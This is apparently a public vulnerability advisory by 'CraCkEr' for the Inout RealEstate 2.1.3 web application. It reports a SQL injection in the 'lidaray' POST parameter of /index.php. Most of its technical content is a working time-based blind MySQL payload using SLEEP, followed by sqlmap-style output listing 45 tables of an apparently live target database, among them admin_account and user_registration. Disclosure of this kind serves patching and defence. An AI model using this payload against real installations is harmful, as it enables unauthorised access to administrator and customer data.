Headline
Inout RealEstate 2.1.3 SQL Injection
Inout RealEstate version 2.1.3 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : inoutscripts.com ││ Vendor : Inout Scripts - Nesote Technologies Private Limited ││ Software : Inout RealEstate 2.1.3 ││ Vuln Type: SQL Injection ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and ││ damage to a company's reputation. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpPOST parameter 'lidaray' is vulnerable to SQLIlidaray=[Inject-HERE]---Parameter: lidaray (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: lidaray=' AND (SELECT 9508 FROM (SELECT(SLEEP(5)))BNUc) AND 'IpMJ'='IpMJ---[INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12[INFO] fetching tables for database: '*****_realestate'[INFO] fetching number of tables for database ''*****_realestate'Database: *****_realestate[45 tables]+--------------------------------+| adcode || admin_account || admin_payment_details || agent_list_request_to_user || broker_citymap || broker_rate || broker_review || brokerabusereport || category_property || chat_details || chat_messages || checkout_ipn || countries || custom_field || detail_statistics_list || email_templates || enquiry_status || forgetpassword || inout_ipns || invoicegen || languages || list_brokermap || list_images || list_main || listopenhouse || normal_statistics_list || paymentdetailstat || popularsearchlist || ppc_currency || public_side_media_detail || public_slide_images || recentsearchlist || settings || sold_listing || soldlistadd || traveller_bank_deposit_history || user_broker_licenses || user_broker_registration || user_email_verification || user_list_agent_request || user_registration || user_wishlist_mapping || userabusereport || userlistactive || wish_list |+--------------------------------+[-] Done